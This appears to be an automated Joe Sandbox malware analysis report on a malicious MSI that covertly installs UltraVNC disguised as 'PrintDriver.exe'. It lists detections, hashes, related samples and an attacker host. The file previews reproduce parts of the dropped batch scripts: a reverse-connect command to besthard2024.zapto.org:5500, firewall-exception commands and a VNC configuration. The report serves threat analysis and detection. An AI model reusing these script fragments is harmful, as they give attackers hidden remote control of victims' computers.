C:\Windows\Installer\MSI3FE7.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI4075.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI4075.tmp | 0% | Virustotal |
C:\Windows\Installer\MSI4384.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI4384.tmp | 0% | Virustotal |

No Antivirus matches

Antivirus detection (domains)
Source | Detection | Scanner | Label
besthard2024.zapto.org | 8% | Virustotal |

Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
https://forum.uvnc.com | 0% | Virustotal |
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1 | 0% | Virustotal |
https://www.thawte.com/cps0/ | 0% | Virustotal |
https://www.advancedinstaller.com | 1% | Virustotal |
https://www.thawte.com/repository0W | 0% | Virustotal |
https://www.uvnc.com | 0% | Virustotal |
http://java.sun.com/products/plugin/index.html#download | 0% | Virustotal |
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
besthard2024.zapto.org | 94.156.104.60 | true | false | | unknown
URLs
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1 | PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | false | | unknown
https://sectigo.com/CPS0 | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
https://forum.uvnc.com | PrintDriver.exe.1.dr | false | | unknown
https://www.uvnc.comcmd | PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | false | | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
https://www.thawte.com/cps0/ | PrintDrivers.exe.1.dr, powercfg.msi.1.dr | false | | unknown
https://forum.uvnc.comvncMenu::WndProc | PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | false | | unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
https://www.thawte.com/repository0W | PrintDrivers.exe.1.dr, powercfg.msi.1.dr | false | | unknown
http://ocsp.thawte.com0 | UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.dr | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
https://www.advancedinstaller.com | PrintDrivers.exe.1.dr, powercfg.msi.1.dr | false | | unknown
https://www.uvnc.com | PrintDriver.exe.1.dr | false | | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.dr | false | URL Reputation: safe | unknown
https://www.uvnc.comhttps://forum.uvnc.comnet | PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | false | | unknown
http://java.sun.com/products/plugin/index.html#download | PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | false | | unknown

IP reputation legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
94.156.104.60 | besthard2024.zapto.org | Bulgaria | 48584 | SARNICA-ASBG | false

Private IPs
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1531399
Start date and time: 2024-10-11 08:54:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 49
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rs8dpaIe6D.msi (renamed because the original name is a hash value)
Original Sample Name: e21b2080c98beb0f04307a5a25630e23.msi
Detection: MAL
Classification: mal100.troj.evad.winMSI@78/47@1/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .msi
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target PrintDriver.exe, PID 7304 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
02:55:05 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
02:55:09 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.156.104.60 | Bill Details.exe | malicious | UltraVNC |
| Bill Details.exe | malicious | UltraVNC |

Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
besthard2024.zapto.org | Bill Details.exe | malicious | UltraVNC | 94.156.104.60
| Bill Details.exe | malicious | UltraVNC | 94.156.104.60
| PersonalizedOffer.exe | malicious | UltraVNC | 94.156.69.75
| PersonalizedOffer.exe | malicious | UltraVNC | 94.156.69.75

Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SARNICA-ASBG | Bill Details.exe | malicious | UltraVNC | 94.156.104.60
| Bill Details.exe | malicious | UltraVNC | 94.156.104.60
| 2ngxhElaud.exe | malicious | Xmrig | 31.13.224.51
| file.exe | malicious | Xmrig | 31.13.224.51
| http://netflix.dittmedlemskap.com/ | malicious | Unknown | 94.156.105.136
| SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exe | malicious | Amadey | 31.13.224.51
| http://www.aliadenibasvuranli.com/ | malicious | Unknown | 94.156.105.78

Context: JA3 Fingerprints
No context

Context: Dropped Files
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Games\PrintDriver.exe | Bill Details.exe | malicious | UltraVNC |
| Bill Details.exe | malicious | UltraVNC |
| PersonalizedOffer.exe | malicious | UltraVNC |
| PersonalizedOffer.exe | malicious | UltraVNC |
| QV3alAAmyK.msi | malicious | Unknown |
| 68uOx5fKVm.msi | malicious | Unknown |
| LjDIDCNaEs.msi | malicious | Unknown |
| Rechnung n. 53067.exe | malicious | Unknown |
| document2304.msi | malicious | Unknown |
C:\Games\PrintDrivers.exe | Bill Details.exe | malicious | UltraVNC |
| Bill Details.exe | malicious | UltraVNC |
| PersonalizedOffer.exe | malicious | UltraVNC |
| PersonalizedOffer.exe | malicious | UltraVNC |
| QV3alAAmyK.msi | malicious | Unknown |
| 68uOx5fKVm.msi | malicious | Unknown |
| LjDIDCNaEs.msi | malicious | Unknown |
| Rechnung n. 53067.exe | malicious | Unknown |
| document2304.msi | malicious | Unknown |
| Ref. Num. 886789432.exe | malicious | PrivateLoader |
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 433272
Entropy (8bit): 6.544879054722073
Encrypted: false
SSDEEP: 12288:Hl7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzTo:F7UJaR10A+biU50unhFNyIGqfo
MD5: EEC86C5A0CFA1E332F79D09EC6428BEE
SHA1: 9D11AF4A93628D5D6C98621A3A51EA0F56B4F6F1
SHA-256: C52401B50337C427CE95266FB2B633CE916E643F046CEECC557D66801B7897A9
SHA-512: 021D44EA264CACC2DDA8D4520C4E139214AE0F88D78FBC900BFCCC35FAF2D40972E5A506C0E08256DA20C7FE246E4934CAB75BC6DA3CC1407951797416FC8C3D
Malicious: false
                                                                  Preview:...@IXOS.@.....@..KY.@.....@.....@.....@.....@.....@......&.{47512254-C195-428F-AD42-A0F24652B3FD}..Pdf..rs8dpaIe6D.msi.@.....@.....@.....@........&.{92C98B75-E1D1-429B-9815-3BF9C1AD8A52}.....@.....@.....@.....@.......@.....@.....@.......@......Pdf......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B1A2B65E-F7DC-4079-8165-372C88BB13EF}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{8438ED6F-3E17-4118-8799-F8A99D851E04}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{0BF8C5FE-822D-49A6-9F4D-84F19DDB4723}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{B93ED057-8995-473C-867B-17ED6B548B26}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{E14EB6B7-011A-4A35-BFED-B669968BC133}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{E6D432F9-EEA9-4218-B20A-1C3CD0BBE2A9}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{A7AE105D-FAB1-4087-8186-7047AA58E351}&.{47512254-C195-428F-AD42-A0F24652B3FD
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 10
Entropy (8bit): 2.9219280948873623
Encrypted: false
SSDEEP: 3:CnQX7:CnC7
MD5: CC11DB32CA80446E75DB4A2CB894CC2A
SHA1: 42C3981D25ACB49A95DF67DA7925F57FDD09FD5E
SHA-256: 39FF54D94F8A0F01247276784051EFF8121AEE27D8686C80D18927109D75C506
SHA-512: AC0D8B129A2FB37CE54A204563A74AA8CA44116F652974FF8ECFD97AA8377AC03A1898673412DE0ADCD6BA5B10441DE7584A30A65B45B1A7BD8B66C0A530012F
Malicious: false
                                                                  Preview:5271523 ..
Process: C:\Windows\System32\msiexec.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1237
Entropy (8bit): 5.351895533121498
Encrypted: false
SSDEEP: 24:Aep9ZV2tXY7ur3C7Thk774kIg4P5W7GykH4O/JWW41k7z2y:noo7urweiykH4OxWLUz2y
MD5: 552AAE999CE9686F113554E2F1F719E0
SHA1: 547E64C2AE0409D9065AA2A788A79BC4F5632C90
SHA-256: B34D39A9C99A125E83C061CA2D7CCA8A987CF290657C4E8682C1DD6CF92F67FC
SHA-512: F8B783CE28161C6B05BEEBC32DE8024BF9B5EA2F78123E1DD28ABDB15F0E518390344FA4B028519BA032452252F84A228194DFF5A15CB5DD7A3384354DFDA77C
Malicious: false
                                                                  Preview:a::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB".. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set EXEC_CMD="PrintDriver.exe"..wmic process where (name=%EXEC_CMD%) get commandline | findstr /i %EXEC_CMD%> NUL..start msedge.exe google.com.. @echo not starting %EXEC_CMD%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\PrintDriver -multi -autoreconnect ID:%numc% -connect besthard2024.zapto.org:5500 -r
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2912200
Entropy (8bit): 6.580549444661274
Encrypted: false
SSDEEP: 49152:B4/PAM814eSOIA+mD1Tb9qJ83xZLFUawAAUA/Ji:h/hrc83lwo
MD5: 27C1C264C6FCE4A5F44419F1783DB8E0
SHA1: E071486E4DFEF3A13F958A252D7000D3CE7BFD89
SHA-256: 29379AFD1CA5439C82931D623FDA335174DC416E5B013591457FA1F7BBE564DB
SHA-512: A80A512BE6F152E8737CD5D0A0A2A193EAF88F3BFB7ED6B7695D227E195DB278E2734EBFC9FE48A68CFB13E4E5BB7FB4825019CFA2210BA741ECF8B11F954A98
Malicious: true
Yara Hits:
• Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Games\PrintDriver.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
• Antivirus: Virustotal, Detection: 8%
Joe Sandbox View:
• Filename: Bill Details.exe, Detection: malicious
• Filename: Bill Details.exe, Detection: malicious
• Filename: PersonalizedOffer.exe, Detection: malicious
• Filename: PersonalizedOffer.exe, Detection: malicious
                                                                  • Filename: QV3alAAmyK.msi, Detection: malicious, Browse
                                                                  • Filename: 68uOx5fKVm.msi, Detection: malicious, Browse
                                                                  • Filename: LjDIDCNaEs.msi, Detection: malicious, Browse
                                                                  • Filename: Rechnung n. 53067.exe, Detection: malicious, Browse
                                                                  • Filename: document2304.msi, Detection: malicious, Browse
                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$...........[..[..[......S.............Q..=.~.T......H......W......i......|..[..@......Z..[..]......F.............Z....|.Z..[...Z......Z..Rich[..........................PE..d....*4e.........."..........J.................@.............................@6.......,...`.....................................................,.....).(.....(.X....H,..'... 6.\....S..T....................U..(....S..8............................................text............................... ..`.rdata..0,..........................@..@.data............"..................@....pdata..X.....(.....................@..@_RDATA........).....................@..@.rsrc...(.....).....................@..@.reloc..\.... 6......6,.............@..B................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1218
                                                                  Entropy (8bit):5.347337974867111
                                                                  Encrypted:false
                                                                  SSDEEP:24:nep9ZV2tXY7ur3C7T0PaV1k774kIwoFEGMoFha9QGykaz/JW0y49:6oo7urw0ieGDQykazxW0z9
                                                                  MD5:6EB13F7936A83F4C44842029914AAD6E
                                                                  SHA1:7B9B27731D4CA6F996CE68C5D68B4D653E31D915
                                                                  SHA-256:8D9BB49947D9DC7FA7BE7310149A99F13A0C02580FD996AAE31C69D673775C49
                                                                  SHA-512:227788193867B2F99A62AE792D91562AD46EA3FA0855CF6EF28FC0DE31D43F2E671C6EF50E534F0235F1F663769715BEF162913A554E86E581FE05455373623E
                                                                  Malicious:false
                                                                  Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\PrintDrivers /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set EXEC_CMD="PrintDriver.exe"..wmic process where (name=%EXEC_CMD%) get command
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):7
                                                                  Entropy (8bit):2.8073549220576046
                                                                  Encrypted:false
                                                                  SSDEEP:3:Fy:c
                                                                  MD5:D56206FDD032E403CCACD4695BFDFFBC
                                                                  SHA1:02990FAB8286E2ED2A48E6612D23E434FD80AEE8
                                                                  SHA-256:D5BE9600EE47C9DA11CCFAAFEBDB28DE9E774B473CC6C3034F7D3643ED3CD239
                                                                  SHA-512:8CD35692BC6810194073E80D9F6CB36BD2221A5CC6A6735984C2FE84EF75B2FBBBFAC0C0D3280B57A056E732DEBA3D6AF62D967EDE636392DB1D5B72380232EC
                                                                  Malicious:false
                                                                  Preview:EXIT ..
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):412832
                                                                  Entropy (8bit):6.584221629525791
                                                                  Encrypted:false
                                                                  SSDEEP:12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
                                                                  MD5:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  SHA1:8172071A639681934D3DC77189EB88A04C8BCFAC
                                                                  SHA-256:E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
                                                                  SHA-512:4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: QV3alAAmyK.msi, Detection: malicious, Browse
                                                                  • Filename: 68uOx5fKVm.msi, Detection: malicious, Browse
                                                                  • Filename: LjDIDCNaEs.msi, Detection: malicious, Browse
                                                                  • Filename: Rechnung n. 53067.exe, Detection: malicious, Browse
                                                                  • Filename: document2304.msi, Detection: malicious, Browse
                                                                  • Filename: Ref. Num. 886789432.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59616
                                                                  Entropy (8bit):6.256689659839278
                                                                  Encrypted:false
                                                                  SSDEEP:768:J+ldD4YWUitnwaGi4uJqGWxD/Ax2OcAjaojLsXqUWyov+ytDq51VHETolvbd:J+/WU+ooWdAxe3oryo2y47
                                                                  MD5:E043EFF841573540FDE059E5894BCB32
                                                                  SHA1:5D9D36CFFB0BE37A21B86D390B591DE078DD7305
                                                                  SHA-256:32EAE05C28F78A4D7C6C6D64EF75C820FEBF6556AC97E361FBCE33EDDFCE0C52
                                                                  SHA-512:CD8DA3E6D6653F3E8720E0CA14FAF1A4384CBF3C1C114C6C6E5ACF31A12E9FD6568D22E3952B716FF5A7C37F6511BF88FD3C950F7D877B530269877B6FBA2036
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j..............Y{......Y{......Y{.......s8......`...............`.......z.......z.......z......Rich............PE..d....Y._.........." .....|...R.......E..............................................-.....`A........................................ ...\...|...................4...................X...8...............................0............... ............................text....z.......|.................. ..`.rdata...6.......8..................@..@.data...............................@....pdata..4...........................@..@_RDATA..............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Windows setup INFormation
                                                                  Category:dropped
                                                                  Size (bytes):3894
                                                                  Entropy (8bit):3.708918006213435
                                                                  Encrypted:false
                                                                  SSDEEP:48:5oAqNab+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:saAIVANniNx
                                                                  MD5:52010E2E305DC5E165FC3376194F46CB
                                                                  SHA1:7ACC7CC893F968255BA19FCEB3E9549489290198
                                                                  SHA-256:6FC15A8582C91CC038734D12667201E3A11476ADCB7A503E0A7F49CBC86664DA
                                                                  SHA-512:63F4DDAF6EC7F48749BC64F71AADD93814CDBDCDCEDAED8F0A4E3084731550100880C96EEA06C7EA08FE27F5B7D4E40911BFC6A322F5C278B6926FB7D26D83B1
                                                                  Malicious:false
                                                                  Preview:..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...9...3.2.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8568
                                                                  Entropy (8bit):7.291311793552157
                                                                  Encrypted:false
                                                                  SSDEEP:192:Z7bJSInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwqwPg4Qw:eInYPLNaowNZvZyEPLwqwaw
                                                                  MD5:2E8AE727E869AF0F7022EF7C749576BA
                                                                  SHA1:957282B254DE53850C6526E141B5D4B6A4FBE182
                                                                  SHA-256:1EE82E7912C37A482FBA1426A845DDD32A518871E586929125AFF7E180ABCEDB
                                                                  SHA-512:03349F044DD23FEFF9E029B646896B926C8C321F894263AD3FF7FE22447D9045ADA576C771DDD9F03CC54C8EBE14D1FDDC5FB9E7D9BADA99BA1063B232C681F9
                                                                  Malicious:false
                                                                  Preview:0.!t..*.H........!e0.!a...1.0...+......0.....+.....7......0...0...+.....7.....M....Z.@....1.}...201018150615Z0...+.....7.....0...0.... o.Z.....8sM.fr...v..zP>..I..fd.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... o.Z.....8sM.fr...v..zP>..I..fd.0....z.|..h%[....T..)..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... }.^V..[S.Ds...k.G.....1.dj...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... }.^V..[S.Ds...k.G.....1.dj...0.......r......."..z.-]1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Generic INItialization configuration [UltraVNC]
                                                                  Category:dropped
                                                                  Size (bytes):1237
                                                                  Entropy (8bit):5.248089588602443
                                                                  Encrypted:false
                                                                  SSDEEP:24:O4OWN4U2WDKaGETVYsICJhFXNTGUSlAXHBFXg9B7Pid9TMyd5hXQ28OjulnN:O4OWN42AoVNICJzwUUQBF2qdp9jt2OjS
                                                                  MD5:CB5B8A5789C15957C039FF3CE988C1A2
                                                                  SHA1:4DE9A626F04BC7C619FDB68E5585739855DED2D1
                                                                  SHA-256:A11A72865948A8D6A88DF530108C3B8BA3E8B4AC6316AC22443AF81FA1C3DAF4
                                                                  SHA-512:68DD583237EA70702D76D9A2A607BBB8F2E2A1E4285DE347B4E23FAA0063B51F20F5A84CBE907EF4C123EBA0ADD1C99CB4F9F1E13DDFF97B34BB1E7C18825E32
                                                                  Malicious:false
                                                                  Preview:[admin]..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..path=C:\Users\Administrator\Documents\Advanced Installer(Giovani)\Projects\OpenIMS\VNC1\RDP\dual monitor..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..UseDSMPlugin=0..AllowLoopback=1..AuthRequired=1..ConnectPriority=0..DSMPlugin=No Plugin Detected..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..PortNumber=5900..HTTPPortNumber=5800..IdleTimeout=0..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QuerySetting=1..QueryTimeout=10..QueryAccept=0..QueryIfNoLogon=0..primary=1..secondary=1..InputsEnabled=1..LockSetting=0..LocalInputsDisabled=0..EnableJapInput=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=A7F8FC867315B7FF5F..passwd2=A7F
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):336328
